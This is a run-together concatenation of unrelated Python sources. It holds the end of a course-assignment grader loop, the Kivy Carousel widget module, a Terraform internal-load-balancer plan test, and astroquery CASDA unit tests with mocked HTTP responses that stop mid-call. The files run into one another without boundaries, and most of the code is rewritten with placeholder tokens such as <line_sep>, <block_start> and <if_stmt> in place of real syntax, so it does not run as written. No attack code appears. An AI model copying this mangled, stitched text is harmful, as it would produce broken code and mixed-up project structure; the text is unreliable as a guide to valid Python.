        for part_id in range(1, 6):
            try:
                func = self.functions[part_id]

                # Each part has different expected arguments/different function
                if part_id == 1:
                    # +1 converts the 0-based index to the grader's 1-based form
                    res = 1 + func(self.X, self.C)
                elif part_id == 2:
                    res = func(self.X, self.idx, 3)
                elif part_id == 3:
                    U, S = func(self.X)
                    res = np.hstack([U.ravel('F'),
                                     np.diag(S).ravel('F')]).tolist()
                elif part_id == 4:
                    res = func(self.X, self.Z, 5)
                elif part_id == 5:
                    res = func(self.X[:, :5], self.Z, 5)
                else:
                    raise KeyError
                yield part_id, res
            except KeyError:
                # Part not implemented by the student: submit a zero score
                yield part_id, 0
''' Carousel ======== .. versionadded:: 1.4.0 The :class:`Carousel` widget provides the classic mobile-friendly carousel view where you can swipe between slides. You can add any content to the carousel and use it horizontally or verticaly. The carousel can display pages in loop or not. Example:: class Example1(App): def build(self): carousel = Carousel(direction='right') for i in range(10): src = "http://placehold.it/480x270.png&text=slide-%d&.png" % i image = Factory.AsyncImage(source=src, allow_stretch=True) carousel.add_widget(image) return carousel Example1().run() .. versionchanged:: 1.5.0 The carousel now supports active children, like the :class:`~kivy.uix.scrollview.ScrollView`. It will detect a swipe gesture according to :attr:`Carousel.scroll_timeout` and :attr:`Carousel.scroll_distance`. In addition, the container used for adding a slide is now hidden in the API. We made a mistake by exposing it to the user. The impacted properties are: :attr:`Carousel.slides`, :attr:`Carousel.current_slide`, :attr:`Carousel.previous_slide` and :attr:`Carousel.next_slide`. '''<line_sep>__all__=('Carousel' )<import_from_stmt>functools partial<import_from_stmt>kivy.clock Clock<import_from_stmt>kivy.factory Factory<import_from_stmt>kivy.animation Animation<import_from_stmt>kivy.uix.stencilview StencilView<import_from_stmt>kivy.uix.relativelayout RelativeLayout<import_from_stmt>kivy.properties BooleanProperty OptionProperty AliasProperty NumericProperty ListProperty ObjectProperty StringProperty<class_stmt>Carousel(StencilView)<block_start>'''Carousel class. See module documentation for more information. '''<line_sep>slides=ListProperty([])<line_sep>'''List of slides inside the Carousel. The slides are added when a widget is added to Carousel using add_widget(). :attr:`slides` is a :class:`~kivy.properties.ListProperty` and is read-only. 
'''<def_stmt>_get_slides_container self<block_start><return>[x.parent<for>x self.slides]<block_end>slides_container=AliasProperty(_get_slides_container <none> bind=('slides' ))<line_sep>direction=OptionProperty('right' options=('right' 'left' 'top' 'bottom'))<line_sep>'''Specifies the direction in which the slides are ordered i.e. the direction from which the user swipes to go from one slide to the next. Can be `right`, `left`, 'top', or `bottom`. For example, with the default value of `right`, the second slide is to the right of the first and the user would swipe from the right towards the left to get to the second slide. :attr:`direction` is a :class:`~kivy.properties.OptionProperty` and defaults to 'right'. '''<line_sep>min_move=NumericProperty(0.2)<line_sep>'''Defines the minimal distance from the edge where the movement is considered a swipe gesture and the Carousel will change its content. This is a percentage of the Carousel width. If the movement doesn't reach this minimal value, then the movement is cancelled and the content is restored to its original position. :attr:`min_move` is a :class:`~kivy.properties.NumericProperty` and defaults to 0.2. '''<line_sep>anim_move_duration=NumericProperty(0.5)<line_sep>'''Defines the duration of the Carousel animation between pages. :attr:`anim_move_duration` is a :class:`~kivy.properties.NumericProperty` and defaults to 0.5. '''<line_sep>anim_cancel_duration=NumericProperty(0.3)<line_sep>'''Defines the duration of the animation when a swipe movement is not accepted. This is generally when the user doesnt swipe enough. See :attr:`min_move`. :attr:`anim_cancel_duration` is a :class:`~kivy.properties.NumericProperty` and defaults to 0.3. '''<line_sep>loop=BooleanProperty(<false>)<line_sep>'''Allow the Carousel to swipe infinitely. When the user reaches the last page, they will return to first page when trying to swipe to the next. :attr:`loop` is a :class:`~kivy.properties.BooleanProperty` and defaults to False. 
'''<def_stmt>_get_index self<block_start><if_stmt>self.slides<block_start><return>self._index%len(self.slides)<block_end><return><none><block_end><def_stmt>_set_index self value<block_start><if_stmt>self.slides<block_start>self._index=value%len(self.slides)<block_end><else_stmt><block_start>self._index=<none><block_end><block_end>index=AliasProperty(_get_index _set_index bind=('_index' 'slides'))<line_sep>'''Get/Set the current visible slide based on the index. :attr:`index` is a :class:`~kivy.properties.AliasProperty` and defaults to 0 (the first item). '''<def_stmt>_prev_slide self<block_start>slides=self.slides<line_sep>len_slides=len(slides)<line_sep>index=self.index<if_stmt>len_slides<l>2# None, or 1 slide <block_start><return><none><block_end><if_stmt>len_slides<eq>2<block_start><if_stmt>index<eq>0<block_start><return><none><block_end><if_stmt>index<eq>1<block_start><return>slides[0]<block_end><block_end><if_stmt>self.loop<and>index<eq>0<block_start><return>slides[-1]<block_end><if_stmt>index<g>0<block_start><return>slides[index-1]<block_end><block_end>previous_slide=AliasProperty(_prev_slide <none> bind=('slides' 'index'))<line_sep>'''The previous slide in the Carousel. It is None if the current slide is the first slide in the Carousel. If :attr:`orientation` is 'horizontal', the previous slide is to the left. If :attr:`orientation` is 'vertical', the previous slide towards the bottom. :attr:`previous_slide` is a :class:`~kivy.properties.AliasProperty`. .. versionchanged:: 1.5.0 This property doesn't expose the container used for storing the slide. It returns the widget you have added. '''<def_stmt>_curr_slide self<block_start><if_stmt>len(self.slides)<block_start><return>self.slides[self.index]<block_end><block_end>current_slide=AliasProperty(_curr_slide <none> bind=('slides' 'index'))<line_sep>'''The currently shown slide. :attr:`current_slide` is an :class:`~kivy.properties.AliasProperty`. .. 
versionchanged:: 1.5.0 The property doesn't expose the container used for storing the slide. It returns widget you have added. '''<def_stmt>_next_slide self<block_start><if_stmt>len(self.slides)<l>2# None, or 1 slide <block_start><return><none><block_end><if_stmt>len(self.slides)<eq>2<block_start><if_stmt>self.index<eq>0<block_start><return>self.slides[1]<block_end><if_stmt>self.index<eq>1<block_start><return><none><block_end><block_end><if_stmt>self.loop<and>self.index<eq>len(self.slides)-1<block_start><return>self.slides[0]<block_end><if_stmt>self.index<l>len(self.slides)-1<block_start><return>self.slides[self.index+1]<block_end><block_end>next_slide=AliasProperty(_next_slide <none> bind=('slides' 'index'))<line_sep>'''The next slide in the Carousel. It is None if the current slide is the last slide in the Carousel. If :attr:`orientation` is 'horizontal', the next slide is to the right. If :attr:`orientation` is 'vertical', the next slide is towards the bottom. :attr:`next_slide` is a :class:`~kivy.properties.AliasProperty`. .. versionchanged:: 1.5.0 The property doesn't expose the container used for storing the slide. It returns the widget you have added. '''<line_sep>scroll_timeout=NumericProperty(200)<line_sep>'''Timeout allowed to trigger the :attr:`scroll_distance`, in milliseconds. If the user has not moved :attr:`scroll_distance` within the timeout, the scrolling will be disabled and the touch event will go to the children. :attr:`scroll_timeout` is a :class:`~kivy.properties.NumericProperty` and defaults to 200 (milliseconds) .. versionadded:: 1.5.0 '''<line_sep>scroll_distance=NumericProperty('20dp')<line_sep>'''Distance to move before scrolling the :class:`Carousel` in pixels. As soon as the distance has been traveled, the :class:`Carousel` will start to scroll, and no touch event will go to children. It is advisable that you base this value on the dpi of your target device's screen. 
:attr:`scroll_distance` is a :class:`~kivy.properties.NumericProperty` and defaults to 20dp. .. versionadded:: 1.5.0 '''<line_sep>anim_type=StringProperty('out_quad')<line_sep>'''Type of animation to use while animating in the next/previous slide. .. versionadded:: 1.8.0 '''<line_sep>#### private properties, for internal use only ### _index=NumericProperty(0 allownone=<true>)<line_sep>_prev=ObjectProperty(<none> allownone=<true>)<line_sep>_current=ObjectProperty(<none> allownone=<true>)<line_sep>_next=ObjectProperty(<none> allownone=<true>)<line_sep>_offset=NumericProperty(0)<line_sep>_touch=ObjectProperty(<none> allownone=<true>)<def_stmt>__init__ self **kwargs<block_start>self._trigger_position_visible_slides=Clock.create_trigger(self._position_visible_slides -1)<line_sep>super(Carousel self).__init__(**kwargs)<line_sep>self._skip_slide=<none><block_end><def_stmt>load_slide self slide<block_start>'''Animate to the slide that is passed as the argument. .. versionchanged:: 1.8.0 '''<line_sep>slides=self.slides<line_sep>start,stop=slides.index(self.current_slide) slides.index(slide)<if_stmt>start<eq>stop<block_start><return><block_end>self._skip_slide=stop<if_stmt>stop<g>start<block_start>self._insert_visible_slides(_next_slide=slide)<line_sep>self.load_next()<block_end><else_stmt><block_start>self._insert_visible_slides(_prev_slide=slide)<line_sep>self.load_previous()<block_end><block_end><def_stmt>load_previous self<block_start>'''Animate to the previous slide. .. versionadded:: 1.7.0 '''<line_sep>self.load_next(mode='prev')<block_end><def_stmt>load_next self mode='next'<block_start>'''Animate to next slide. .. 
versionadded:: 1.7.0 '''<if_stmt><not>self.index<is><none><block_start>w,h=self.size<line_sep>_direction={'top':-h/2 'bottom':h/2 'left':w/2 'right':-w/2}<line_sep>_offset=_direction[self.direction]<if_stmt>mode<eq>'prev'<block_start>_offset=-_offset<block_end>self._start_animation(min_move=0 offset=_offset)<block_end><block_end><def_stmt>get_slide_container self slide<block_start><return>slide.parent<block_end><def_stmt>_insert_visible_slides self _next_slide=<none> _prev_slide=<none><block_start>get_slide_container=self.get_slide_container<line_sep>previous_slide=_prev_slide<if>_prev_slide<else>self.previous_slide<if_stmt>previous_slide<block_start>self._prev=get_slide_container(previous_slide)<block_end><else_stmt><block_start>self._prev=<none><block_end>current_slide=self.current_slide<if_stmt>current_slide<block_start>self._current=get_slide_container(current_slide)<block_end><else_stmt><block_start>self._current=<none><block_end>next_slide=_next_slide<if>_next_slide<else>self.next_slide<if_stmt>next_slide<block_start>self._next=get_slide_container(next_slide)<block_end><else_stmt><block_start>self._next=<none><block_end>super_remove=super(Carousel self).remove_widget<for_stmt>container self.slides_container<block_start>super_remove(container)<block_end><if_stmt>self._prev<block_start>super(Carousel self).add_widget(self._prev)<block_end><if_stmt>self._next<block_start>super(Carousel self).add_widget(self._next)<block_end><if_stmt>self._current<block_start>super(Carousel self).add_widget(self._current)<block_end><block_end><def_stmt>_position_visible_slides self *args<block_start>slides,index=self.slides self.index<line_sep>no_of_slides=len(slides)-1<if_stmt><not>slides<block_start><return><block_end>x,y,width,height=self.x self.y self.width self.height<line_sep>_offset,direction=self._offset self.direction<line_sep>_prev,_next,_current=self._prev self._next 
self._current<line_sep>get_slide_container=self.get_slide_container<line_sep>last_slide=get_slide_container(slides[-1])<line_sep>first_slide=get_slide_container(slides[0])<line_sep>skip_next=<false><line_sep>_loop=self.loop<if_stmt>direction[0]<in>['r' 'l']<block_start>xoff=x+_offset<line_sep>x_prev={'l':xoff+width 'r':xoff-width}<line_sep>x_next={'l':xoff-width 'r':xoff+width}<if_stmt>_prev<block_start>_prev.pos=(x_prev[direction[0]] y)<block_end><elif_stmt>_loop<and>_next<and>index<eq>0# if first slide is moving to right with direction set to right # or toward left with direction set to left <block_start><if_stmt>((_offset<g>0<and>direction[0]<eq>'r')<or>(_offset<l>0<and>direction[0]<eq>'l'))# put last_slide before first slide <block_start>last_slide.pos=(x_prev[direction[0]] y)<line_sep>skip_next=<true><block_end><block_end><if_stmt>_current<block_start>_current.pos=(xoff y)<block_end><if_stmt>skip_next<block_start><return><block_end><if_stmt>_next<block_start>_next.pos=(x_next[direction[0]] y)<block_end><elif_stmt>_loop<and>_prev<and>index<eq>no_of_slides<block_start><if_stmt>((_offset<l>0<and>direction[0]<eq>'r')<or>(_offset<g>0<and>direction[0]<eq>'l'))<block_start>first_slide.pos=(x_next[direction[0]] y)<block_end><block_end><block_end><if_stmt>direction[0]<in>['t' 'b']<block_start>yoff=y+_offset<line_sep>y_prev={'t':yoff-height 'b':yoff+height}<line_sep>y_next={'t':yoff+height 'b':yoff-height}<if_stmt>_prev<block_start>_prev.pos=(x y_prev[direction[0]])<block_end><elif_stmt>_loop<and>_next<and>index<eq>0<block_start><if_stmt>((_offset<g>0<and>direction[0]<eq>'t')<or>(_offset<l>0<and>direction[0]<eq>'b'))<block_start>last_slide.pos=(x y_prev[direction[0]])<line_sep>skip_next=<true><block_end><block_end><if_stmt>_current<block_start>_current.pos=(x yoff)<block_end><if_stmt>skip_next<block_start><return><block_end><if_stmt>_next<block_start>_next.pos=(x 
y_next[direction[0]])<block_end><elif_stmt>_loop<and>_prev<and>index<eq>no_of_slides<block_start><if_stmt>((_offset<l>0<and>direction[0]<eq>'t')<or>(_offset<g>0<and>direction[0]<eq>'b'))<block_start>first_slide.pos=(x y_next[direction[0]])<block_end><block_end><block_end><block_end><def_stmt>on_size self *args<block_start>size=self.size<for_stmt>slide self.slides_container<block_start>slide.size=size<block_end>self._trigger_position_visible_slides()<block_end><def_stmt>on_pos self *args<block_start>self._trigger_position_visible_slides()<block_end><def_stmt>on_index self *args<block_start>self._insert_visible_slides()<line_sep>self._trigger_position_visible_slides()<line_sep>self._offset=0<block_end><def_stmt>on_slides self *args<block_start><if_stmt>self.slides<block_start>self.index=self.index%len(self.slides)<block_end>self._insert_visible_slides()<line_sep>self._trigger_position_visible_slides()<block_end><def_stmt>on__offset self *args<block_start>self._trigger_position_visible_slides()<line_sep># if reached full offset, switch index to next or prev 
direction=self.direction<line_sep>_offset=self._offset<line_sep>width=self.width<line_sep>height=self.height<line_sep>index=self.index<if_stmt>self._skip_slide<is><not><none><or>index<is><none><block_start><return><block_end><if_stmt>direction[0]<eq>'r'<block_start><if_stmt>_offset<le>-width<block_start>index<augadd>1<block_end><if_stmt>_offset<ge>width<block_start>index<augsub>1<block_end><block_end><if_stmt>direction[0]<eq>'l'<block_start><if_stmt>_offset<le>-width<block_start>index<augsub>1<block_end><if_stmt>_offset<ge>width<block_start>index<augadd>1<block_end><block_end><if_stmt>direction[0]<eq>'t'<block_start><if_stmt>_offset<le>-height<block_start>index<augadd>1<block_end><if_stmt>_offset<ge>height<block_start>index<augsub>1<block_end><block_end><if_stmt>direction[0]<eq>'b'<block_start><if_stmt>_offset<le>-height<block_start>index<augsub>1<block_end><if_stmt>_offset<ge>height<block_start>index<augadd>1<block_end><block_end>self.index=index<block_end><def_stmt>_start_animation self *args **kwargs# compute target offset for ease back, next or prev <block_start>new_offset=0<line_sep>direction=kwargs.get('direction' self.direction)<line_sep>is_horizontal=direction[0]<in>['r' 'l']<line_sep>extent=self.width<if>is_horizontal<else>self.height<line_sep>min_move=kwargs.get('min_move' self.min_move)<line_sep>_offset=kwargs.get('offset' self._offset)<if_stmt>_offset<l>min_move<times>-extent<block_start>new_offset=-extent<block_end><elif_stmt>_offset<g>min_move<times>extent<block_start>new_offset=extent<block_end># if new_offset is 0, it wasnt enough to go next/prev dur=self.anim_move_duration<if_stmt>new_offset<eq>0<block_start>dur=self.anim_cancel_duration<block_end># detect edge cases if not looping len_slides=len(self.slides)<line_sep>index=self.index<if_stmt><not>self.loop<or>len_slides<eq>1<block_start>is_first=(index<eq>0)<line_sep>is_last=(index<eq>len_slides-1)<if_stmt>direction[0]<in>['r' 
't']<block_start>towards_prev=(new_offset<g>0)<line_sep>towards_next=(new_offset<l>0)<block_end><else_stmt><block_start>towards_prev=(new_offset<l>0)<line_sep>towards_next=(new_offset<g>0)<block_end><if_stmt>(is_first<and>towards_prev)<or>(is_last<and>towards_next)<block_start>new_offset=0<block_end><block_end>anim=Animation(_offset=new_offset d=dur t=self.anim_type)<line_sep>anim.cancel_all(self)<def_stmt>_cmp *l<block_start><if_stmt>self._skip_slide<is><not><none><block_start>self.index=self._skip_slide<line_sep>self._skip_slide=<none><block_end><block_end>anim.bind(on_complete=_cmp)<line_sep>anim.start(self)<block_end><def_stmt>_get_uid self prefix='sv'<block_start><return>'{0}.{1}'.format(prefix self.uid)<block_end><def_stmt>on_touch_down self touch<block_start><if_stmt><not>self.collide_point(*touch.pos)<block_start>touch.ud[self._get_uid('cavoid')]=<true><line_sep><return><block_end><if_stmt>self.disabled<block_start><return><true><block_end><if_stmt>self._touch<block_start><return>super(Carousel self).on_touch_down(touch)<block_end>Animation.cancel_all(self)<line_sep>self._touch=touch<line_sep>uid=self._get_uid()<line_sep>touch.grab(self)<line_sep>touch.ud[uid]={'mode':'unknown' 'time':touch.time_start}<line_sep>Clock.schedule_once(self._change_touch_mode self.scroll_timeout/1000.)<line_sep><return><true><block_end><def_stmt>on_touch_move self touch<block_start><if_stmt>self._get_uid('cavoid')<in>touch.ud<block_start><return><block_end><if_stmt>self._touch<is><not>touch<block_start>super(Carousel self).on_touch_move(touch)<line_sep><return>self._get_uid()<in>touch.ud<block_end><if_stmt>touch.grab_current<is><not>self<block_start><return><true><block_end>ud=touch.ud[self._get_uid()]<line_sep>direction=self.direction<if_stmt>ud['mode']<eq>'unknown'<block_start><if_stmt>direction[0]<in>('r' 
'l')<block_start>distance=abs(touch.ox-touch.x)<block_end><else_stmt><block_start>distance=abs(touch.oy-touch.y)<block_end><if_stmt>distance<g>self.scroll_distance<block_start>Clock.unschedule(self._change_touch_mode)<line_sep>ud['mode']='scroll'<block_end><block_end><else_stmt><block_start><if_stmt>direction[0]<in>('r' 'l')<block_start>self._offset<augadd>touch.dx<block_end><if_stmt>direction[0]<in>('t' 'b')<block_start>self._offset<augadd>touch.dy<block_end><block_end><return><true><block_end><def_stmt>on_touch_up self touch<block_start><if_stmt>self._get_uid('cavoid')<in>touch.ud<block_start><return><block_end><if_stmt>self<in>[x()<for>x touch.grab_list]<block_start>touch.ungrab(self)<line_sep>self._touch=<none><line_sep>ud=touch.ud[self._get_uid()]<if_stmt>ud['mode']<eq>'unknown'<block_start>Clock.unschedule(self._change_touch_mode)<line_sep>super(Carousel self).on_touch_down(touch)<line_sep>Clock.schedule_once(partial(self._do_touch_up touch) .1)<block_end><else_stmt><block_start>self._start_animation()<block_end><block_end><else_stmt><block_start><if_stmt>self._touch<is><not>touch<and>self.uid<not><in>touch.ud<block_start>super(Carousel self).on_touch_up(touch)<block_end><block_end><return>self._get_uid()<in>touch.ud<block_end><def_stmt>_do_touch_up self touch *largs<block_start>super(Carousel self).on_touch_up(touch)<line_sep># don't forget about grab event! 
<for_stmt>x touch.grab_list[:]<block_start>touch.grab_list.remove(x)<line_sep>x=x()<if_stmt><not>x<block_start><continue><block_end>touch.grab_current=x<line_sep>super(Carousel self).on_touch_up(touch)<block_end>touch.grab_current=<none><block_end><def_stmt>_change_touch_mode self *largs<block_start><if_stmt><not>self._touch<block_start><return><block_end>self._start_animation()<line_sep>uid=self._get_uid()<line_sep>touch=self._touch<line_sep>ud=touch.ud[uid]<if_stmt>ud['mode']<eq>'unknown'<block_start>touch.ungrab(self)<line_sep>self._touch=<none><line_sep>super(Carousel self).on_touch_down(touch)<line_sep><return><block_end><block_end><def_stmt>add_widget self widget index=0<block_start>slide=RelativeLayout(size=self.size x=self.x-self.width y=self.y)<line_sep>slide.add_widget(widget)<line_sep>super(Carousel self).add_widget(slide index)<if_stmt>index<ne>0<block_start>self.slides.insert(index widget)<block_end><else_stmt><block_start>self.slides.append(widget)<block_end><block_end><def_stmt>remove_widget self widget *args **kwargs# XXX be careful, the widget.parent refer to the RelativeLayout # added in add_widget(). But it will break if RelativeLayout # implementation change. 
# if we passed the real widget <block_start><if_stmt>widget<in>self.slides<block_start>slide=widget.parent<line_sep>self.slides.remove(widget)<line_sep><return>slide.remove_widget(widget *args **kwargs)<block_end><return>super(Carousel self).remove_widget(widget *args **kwargs)<block_end><def_stmt>clear_widgets self<block_start><for_stmt>slide self.slides[:]<block_start>self.remove_widget(slide)<block_end>super(Carousel self).clear_widgets()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_from_stmt>kivy.app App<class_stmt>Example1(App)<block_start><def_stmt>build self<block_start>carousel=Carousel(direction='left' loop=<true>)<for_stmt>i range(4)<block_start>src="http://placehold.it/480x270.png&text=slide-%d&.png"%i<line_sep>image=Factory.AsyncImage(source=src allow_stretch=<true>)<line_sep>carousel.add_widget(image)<block_end><return>carousel<block_end><block_end>Example1().run()<block_end>
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>os<import_stmt>pytest<line_sep>FIXTURES_DIR=os.path.join(os.path.dirname(__file__) 'fixture')<line_sep>_BACKENDS='[{balancing_mode="CONNECTION", group="foo", failover=false}]'<def_stmt>test_defaults plan_runner<block_start>"Test variable defaults."<line_sep>_,resources=plan_runner(FIXTURES_DIR backends=_BACKENDS)<assert_stmt>len(resources)<eq>3<line_sep>resources=dict((r['type'] r['values'])<for>r resources)<line_sep>fwd_rule=resources['google_compute_forwarding_rule']<assert_stmt>fwd_rule['load_balancing_scheme']<eq>'INTERNAL'<assert_stmt>fwd_rule['all_ports']<assert_stmt>fwd_rule['allow_global_access']<is><none><line_sep>backend=resources['google_compute_region_backend_service']<assert_stmt>len(backend['backend'])<eq>1<assert_stmt>backend['backend'][0]['group']<eq>'foo'<line_sep>health_check=resources['google_compute_health_check']<for_stmt>k,v health_check.items()<block_start><if_stmt>k<eq>'http_health_check'<block_start><assert_stmt>len(v)<eq>1<assert_stmt>v[0]['port_specification']<eq>'USE_SERVING_PORT'<block_end><elif_stmt>k.endswith('_health_check')<block_start><assert_stmt>len(v)<eq>0<block_end><block_end><block_end><def_stmt>test_forwarding_rule plan_runner<block_start>"Test forwarding rule variables."<line_sep>_,resources=plan_runner(FIXTURES_DIR backends=_BACKENDS global_access='true' ports="[80]")<assert_stmt>len(resources)<eq>3<line_sep>values=[r['values']<for>r 
resources<if>r['type']<eq>'google_compute_forwarding_rule'][0]<assert_stmt><not>values['all_ports']<assert_stmt>values['ports']<eq>['80']<assert_stmt>values['allow_global_access']<block_end>
# -*- coding: utf-8 -* # Licensed under a 3-clause BSD style license - see LICENSE.rst <import_stmt>pytest<import_stmt>requests<import_stmt>os<import_from_stmt>astropy.coordinates SkyCoord<import_stmt>astropy.units<as>u<import_from_stmt>astropy.table Table Column<import_from_stmt>astropy.io.votable parse<import_from_stmt>astroquery log<import_from_stmt>astroquery.casda Casda<try_stmt><block_start><import_from_stmt>unittest.mock Mock patch PropertyMock MagicMock<block_end><except_stmt>ImportError<block_start>pytest.skip("Install mock for the casda tests." allow_module_level=<true>)<block_end>DATA_FILES={'CIRCLE':'cone.xml' 'RANGE':'box.xml' 'DATALINK':'datalink.xml' 'RUN_JOB':'run_job.xml' 'COMPLETED_JOB':'completed_job.xml' 'DATALINK_NOACCESS':'datalink_noaccess.xml'}<class_stmt>MockResponse<block_start><def_stmt>__init__ self content<block_start>self.content=content<line_sep>self.text=content.decode()<block_end><def_stmt>raise_for_status self<block_start><return><block_end><block_end>first_job_pass=<true><def_stmt>get_mockreturn self method url data=<none> timeout=10 files=<none> params=<none> headers=<none> **kwargs<block_start>log.debug("get_mockreturn url:{} params:{} kwargs:{}".format(url params kwargs))<if_stmt>kwargs<and>'auth'<in>kwargs<block_start>auth=kwargs['auth']<if_stmt>auth<and>(auth[0]<ne>'user'<or>auth[1]<ne>'password')<block_start>log.debug("Rejecting credentials")<line_sep><return>create_auth_failure_response()<block_end><block_end><if_stmt>'data/async'<in>str(url)# Responses for an asynchronous SODA job 
<block_start><if_stmt>str(url).endswith('data/async')<block_start>self.first_job_pass=<true><line_sep><return>create_soda_create_response('111-000-111-000')<block_end><elif_stmt>str(url).endswith('/phase')<and>method<eq>'POST'<block_start>key="RUN_JOB"<block_end><elif_stmt>str(url).endswith('111-000-111-000')<and>method<eq>'GET'<block_start>key="RUN_JOB"<if>self.first_job_pass<else>"COMPLETED_JOB"<line_sep>self.first_job_pass=<false><block_end><else_stmt><block_start><raise>ValueError("Unexpected SODA async {} call to url {}".format(method url))<block_end><block_end><elif_stmt>'datalink'<in>str(url)<block_start><if_stmt>'cube-244'<in>str(url)<block_start>key='DATALINK'<block_end><else_stmt><block_start>key='DATALINK_NOACCESS'<block_end><block_end><else_stmt><block_start>key=params['POS'].split()[0]<if>params['POS']<else><none><block_end>filename=data_path(DATA_FILES[key])<line_sep>log.debug('providing '+filename)<line_sep>content=open(filename 'rb').read()<line_sep><return>MockResponse(content)<block_end><def_stmt>create_soda_create_response jobid<block_start>job_url='https://casda.csiro.au/casda_data_access/data/async/'+jobid<line_sep>create_response_headers=[['location' job_url]]<line_sep>create_response=Mock(spec=requests.Response)<line_sep>create_response.configure_mock(status_code=303 message='OK' headers=create_response_headers url=job_url)<line_sep><return>create_response<block_end><def_stmt>create_auth_failure_response <block_start>unauthenticated_headers=[['WWW-Authenticate' 'Basic realm="ATNF OPAL Login"']]<line_sep>create_response=MagicMock(spec=requests.Response)<line_sep>attrs={'raise_for_status.side_effect':requests.exceptions.HTTPError()}<line_sep>create_response.configure_mock(status_code=401 message='OK' headers=unauthenticated_headers **attrs)<line_sep><return>create_response<block_end>@pytest.fixture<def_stmt>patch_get request<block_start><try_stmt><block_start>mp=request.getfixturevalue("monkeypatch")<block_end><except_stmt>AttributeError# 
pytest < 3 <block_start>mp=request.getfuncargvalue("monkeypatch")<block_end>mp.setattr(requests.Session 'request' get_mockreturn)<line_sep><return>mp<block_end><def_stmt>data_path filename<block_start>data_dir=os.path.join(os.path.dirname(__file__) 'data')<line_sep><return>os.path.join(data_dir filename)<block_end><def_stmt>isclose value1 value2 abs_tol=1e-09<block_start><return>abs(value1-value2)<l>abs_tol<block_end><def_stmt>test_query_region_text_radius patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>radius=0.5<line_sep>query_payload=Casda.query_region('22h15m38.2s -45d50m30.5s' radius=radius<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('CIRCLE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'CIRCLE'<assert_stmt>isclose(float(pos_parts[1]) ra abs_tol=1e-4)<assert_stmt>isclose(float(pos_parts[2]) dec abs_tol=1e-4)<assert_stmt>isclose(float(pos_parts[3]) radius)<assert_stmt>len(pos_parts)<eq>4<line_sep>responses=Casda.query_region('22h15m38.2s -45d50m30.5s' radius=0.5<times>u.deg cache=<false>)<assert_stmt>isinstance(responses Table)<assert_stmt>len(responses)<eq>3<block_end><def_stmt>test_query_region_radius patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>radius=0.5<line_sep>centre=SkyCoord(ra dec unit=('deg' 'deg'))<line_sep>query_payload=Casda.query_region(centre radius=radius<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('CIRCLE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'CIRCLE'<assert_stmt>isclose(float(pos_parts[1]) ra abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[2]) dec abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[3]) 
radius)<assert_stmt>len(pos_parts)<eq>4<line_sep>responses=Casda.query_region(centre radius=0.5<times>u.deg cache=<false>)<assert_stmt>isinstance(responses Table)<assert_stmt>len(responses)<eq>3<block_end><def_stmt>test_query_region_async_radius patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>radius=0.5<line_sep>centre=SkyCoord(ra dec unit=('deg' 'deg'))<line_sep>query_payload=Casda.query_region_async(centre radius=radius<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('CIRCLE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'CIRCLE'<assert_stmt>isclose(float(pos_parts[1]) ra abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[2]) dec abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[3]) radius)<assert_stmt>len(pos_parts)<eq>4<line_sep>responses=Casda.query_region_async(centre radius=0.5<times>u.deg cache=<false>)<assert_stmt>isinstance(responses MockResponse)<block_end><def_stmt>test_query_region_box patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>width=0.5<line_sep>height=0.2<line_sep>centre=SkyCoord(ra dec unit=('deg' 'deg'))<line_sep>query_payload=Casda.query_region(centre width=width<times>u.deg height=height<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('RANGE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'RANGE'<assert_stmt>isclose(float(pos_parts[1]) ra-width/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[2]) ra+width/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[3]) dec-height/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[4]) dec+height/2 abs_tol=1e-5)<assert_stmt>len(pos_parts)<eq>5<line_sep>responses=Casda.query_region(centre width=width<times>u.deg height=height<times>u.deg 
